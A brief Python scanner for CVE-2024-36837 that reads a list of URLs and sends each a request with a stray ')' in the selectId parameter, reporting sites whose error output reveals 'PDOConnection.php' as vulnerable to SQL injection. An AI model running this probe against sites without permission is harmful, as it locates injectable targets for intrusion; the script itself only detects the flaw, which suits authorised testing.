CVE-2024-36837.py

import requests
def check_vulnerability(url):
    # Remove trailing slash if present
    if url.endswith('/'):
        url = url[:-1]
    # Construct the URL with the required endpoint
    test_url = f"{url}/api/products?limit=20&priceOrder=&salesOrder=&selectId=)"
    try:
        response = requests.get(test_url)
        # Check if the response contains the specific string indicating a vulnerability
        if 'PDOConnection.php' in response.text:
            print(f"\033[31m[HIGH RISK]\033[0m Vulnerability found in: {url}")
        else:
            print(f"\033[32m[SAFE]\033[0m No vulnerability found in: {url}")
    except requests.RequestException as e:
        print(f"\033[33m[ERROR]\033[0m Could not connect to {url}. ")#Error: {e}")
def main():
    # Read URLs from url.txt
    with open('url.txt', 'r') as file:
        urls = file.readlines()

    for url in urls:
        url = url.strip()  # Remove any leading/trailing whitespace characters
        if not url.startswith('http'):
            url = 'http://' + url  # Add http scheme if missing
        check_vulnerability(url)
if __name__ == "__main__":
    main()